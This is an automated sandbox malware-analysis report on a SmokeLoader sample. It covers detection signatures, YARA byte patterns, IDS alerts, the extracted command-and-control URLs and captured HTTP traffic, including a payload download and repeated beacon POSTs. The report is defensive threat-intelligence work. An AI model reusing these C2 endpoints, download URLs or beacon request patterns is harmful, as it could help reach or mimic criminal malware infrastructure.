Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mGFoU1INUk.exe

Overview

General Information

Sample name:mGFoU1INUk.exe
renamed because original name is a hash value
Original sample name:18daa2c6a6f6385895582d4e9954d851.exe
Analysis ID:1532225
MD5:18daa2c6a6f6385895582d4e9954d851
SHA1:88f22a473df849c91e70a91a8376abff2b5b108f
SHA256:346085fe3603fbc085f801241cccdc4d3765929a6cd5f9906cbcfcd6657065a3
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • mGFoU1INUk.exe (PID: 1976 cmdline: "C:\Users\user\Desktop\mGFoU1INUk.exe" MD5: 18DAA2C6A6F6385895582D4E9954D851)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • ibjgueh (PID: 5960 cmdline: C:\Users\user\AppData\Roaming\ibjgueh MD5: 18DAA2C6A6F6385895582D4E9954D851)
  • ibjgueh (PID: 2604 cmdline: C:\Users\user\AppData\Roaming\ibjgueh MD5: 18DAA2C6A6F6385895582D4E9954D851)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 7 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ibjgueh, CommandLine: C:\Users\user\AppData\Roaming\ibjgueh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ibjgueh, NewProcessName: C:\Users\user\AppData\Roaming\ibjgueh, OriginalFileName: C:\Users\user\AppData\Roaming\ibjgueh, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\ibjgueh, ProcessId: 5960, ProcessName: ibjgueh
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-12T20:07:29.848902+020020391031A Network Trojan was detected192.168.2.549792119.204.11.280TCP
      2024-10-12T20:07:31.374913+020020391031A Network Trojan was detected192.168.2.549799119.204.11.280TCP
      2024-10-12T20:07:32.891080+020020391031A Network Trojan was detected192.168.2.549809119.204.11.280TCP
      2024-10-12T20:07:34.426343+020020391031A Network Trojan was detected192.168.2.549820119.204.11.280TCP
      2024-10-12T20:07:35.946752+020020391031A Network Trojan was detected192.168.2.549831119.204.11.280TCP
      2024-10-12T20:07:37.459108+020020391031A Network Trojan was detected192.168.2.549841119.204.11.280TCP
      2024-10-12T20:07:38.958859+020020391031A Network Trojan was detected192.168.2.549849119.204.11.280TCP
      2024-10-12T20:07:40.481991+020020391031A Network Trojan was detected192.168.2.549861119.204.11.280TCP
      2024-10-12T20:07:41.972367+020020391031A Network Trojan was detected192.168.2.549870119.204.11.280TCP
      2024-10-12T20:07:43.476100+020020391031A Network Trojan was detected192.168.2.549881119.204.11.280TCP
      2024-10-12T20:07:44.967534+020020391031A Network Trojan was detected192.168.2.549892119.204.11.280TCP
      2024-10-12T20:07:46.457451+020020391031A Network Trojan was detected192.168.2.549903119.204.11.280TCP
      2024-10-12T20:07:47.959801+020020391031A Network Trojan was detected192.168.2.549914119.204.11.280TCP
      2024-10-12T20:07:49.466916+020020391031A Network Trojan was detected192.168.2.549925119.204.11.280TCP
      2024-10-12T20:07:50.949811+020020391031A Network Trojan was detected192.168.2.549932119.204.11.280TCP
      2024-10-12T20:07:52.436567+020020391031A Network Trojan was detected192.168.2.549943119.204.11.280TCP
      2024-10-12T20:07:53.920305+020020391031A Network Trojan was detected192.168.2.549954119.204.11.280TCP
      2024-10-12T20:07:55.414257+020020391031A Network Trojan was detected192.168.2.549964119.204.11.280TCP
      2024-10-12T20:07:56.903613+020020391031A Network Trojan was detected192.168.2.549972119.204.11.280TCP
      2024-10-12T20:07:58.598972+020020391031A Network Trojan was detected192.168.2.549983119.204.11.280TCP
      2024-10-12T20:08:00.089880+020020391031A Network Trojan was detected192.168.2.549993119.204.11.280TCP
      2024-10-12T20:08:01.634818+020020391031A Network Trojan was detected192.168.2.549998119.204.11.280TCP
      2024-10-12T20:08:03.281168+020020391031A Network Trojan was detected192.168.2.549999119.204.11.280TCP
      2024-10-12T20:08:04.804921+020020391031A Network Trojan was detected192.168.2.550000119.204.11.280TCP
      2024-10-12T20:08:08.140704+020020391031A Network Trojan was detected192.168.2.550002119.204.11.280TCP
      2024-10-12T20:08:09.781553+020020391031A Network Trojan was detected192.168.2.550003119.204.11.280TCP
      2024-10-12T20:08:11.264790+020020391031A Network Trojan was detected192.168.2.550004119.204.11.280TCP
      2024-10-12T20:08:12.807847+020020391031A Network Trojan was detected192.168.2.550005119.204.11.280TCP
      2024-10-12T20:08:15.107333+020020391031A Network Trojan was detected192.168.2.550006119.204.11.280TCP
      2024-10-12T20:08:16.639263+020020391031A Network Trojan was detected192.168.2.550007119.204.11.280TCP
      2024-10-12T20:08:18.120800+020020391031A Network Trojan was detected192.168.2.550008119.204.11.280TCP
      2024-10-12T20:08:19.640221+020020391031A Network Trojan was detected192.168.2.550009119.204.11.280TCP
      2024-10-12T20:08:21.135939+020020391031A Network Trojan was detected192.168.2.550010119.204.11.280TCP
      2024-10-12T20:08:22.613113+020020391031A Network Trojan was detected192.168.2.550011119.204.11.280TCP
      2024-10-12T20:08:23.941825+020020391031A Network Trojan was detected192.168.2.550012119.204.11.280TCP
      2024-10-12T20:08:25.476955+020020391031A Network Trojan was detected192.168.2.550013119.204.11.280TCP
      2024-10-12T20:09:34.491548+020020391031A Network Trojan was detected192.168.2.550014119.204.11.280TCP
      2024-10-12T20:09:39.836652+020020391031A Network Trojan was detected192.168.2.550015119.204.11.280TCP
      2024-10-12T20:09:45.207552+020020391031A Network Trojan was detected192.168.2.550016119.204.11.280TCP
      2024-10-12T20:09:51.304176+020020391031A Network Trojan was detected192.168.2.550017119.204.11.280TCP
      2024-10-12T20:09:57.203146+020020391031A Network Trojan was detected192.168.2.550018119.204.11.280TCP
      2024-10-12T20:10:07.063551+020020391031A Network Trojan was detected192.168.2.560089175.119.10.23180TCP
      2024-10-12T20:10:11.870177+020020391031A Network Trojan was detected192.168.2.560090175.119.10.23180TCP
      2024-10-12T20:10:17.910339+020020391031A Network Trojan was detected192.168.2.560091175.119.10.23180TCP
      2024-10-12T20:10:23.702222+020020391031A Network Trojan was detected192.168.2.560092175.119.10.23180TCP
      2024-10-12T20:10:30.353244+020020391031A Network Trojan was detected192.168.2.560093175.119.10.23180TCP
      2024-10-12T20:10:36.229845+020020391031A Network Trojan was detected192.168.2.560094175.119.10.23180TCP
      2024-10-12T20:10:41.630767+020020391031A Network Trojan was detected192.168.2.560095175.119.10.23180TCP
      2024-10-12T20:10:46.361537+020020391031A Network Trojan was detected192.168.2.560096175.119.10.23180TCP
      2024-10-12T20:10:51.684157+020020391031A Network Trojan was detected192.168.2.560097175.119.10.23180TCP
      2024-10-12T20:10:56.903490+020020391031A Network Trojan was detected192.168.2.560098175.119.10.23180TCP
      2024-10-12T20:11:04.022959+020020391031A Network Trojan was detected192.168.2.560099175.119.10.23180TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
      Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
      Source: http://nwgrus.ru/tmp/index.phpVirustotal: Detection: 16%Perma Link
      Source: C:\Users\user\AppData\Roaming\ibjguehReversingLabs: Detection: 36%
      Source: C:\Users\user\AppData\Roaming\ibjguehVirustotal: Detection: 36%Perma Link
      Source: mGFoU1INUk.exeReversingLabs: Detection: 36%
      Source: mGFoU1INUk.exeVirustotal: Detection: 36%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\ibjguehJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\B995.exeJoe Sandbox ML: detected
      Source: mGFoU1INUk.exeJoe Sandbox ML: detected
      Source: mGFoU1INUk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50001 version: TLS 1.2

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49799 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49831 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49820 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49849 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49861 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49792 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49841 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49881 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49870 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49932 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49925 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49954 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49983 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49964 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50000 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49903 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50008 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49892 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60097 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60089 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50002 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50006 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60094 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50010 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60098 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60093 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49943 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50003 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49993 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50009 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60099 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60096 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49914 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49809 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60090 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50005 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50007 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49972 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60095 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49999 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49998 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50004 -> 119.204.11.2:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60092 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60091 -> 175.119.10.231:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50011 -> 119.204.11.2:80
      Source: C:\Windows\explorer.exeNetwork Connect: 175.119.10.231 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 119.204.11.2 80Jump to behavior
      Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
      Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
      Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
      Source: Joe Sandbox ViewIP Address: 175.119.10.231 175.119.10.231
      Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
      Source: Joe Sandbox ViewASN Name: KIXS-AS-KRKoreaTelecomKR KIXS-AS-KRKoreaTelecomKR
      Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
      Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yilmrbbiqbh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://saaiglxgesx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmicpxlifessw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbthucuxeraia.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fhouqknummbbf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://onlnloemqmkdhio.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrccmhuqkqkddsnr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgoujgwybxsges.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jousimacigldf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sswxpvuufbvykyb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cdinohvnolrheurg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lifadhlvdwb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ssfieliemcmj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oigeugvvgtqexcr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rscdgmrjlxccyebn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdrsrpxnderfeln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://letknxuqhdcyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wkvsglvqmchooeii.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://liwpdohaxncmk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://brtyhhcwxjs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ndcrdrvnqscc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bsujsjkqxtjctly.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkcyaumypyw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vllrmfxybsdiplqu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tamqyjusikafosy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
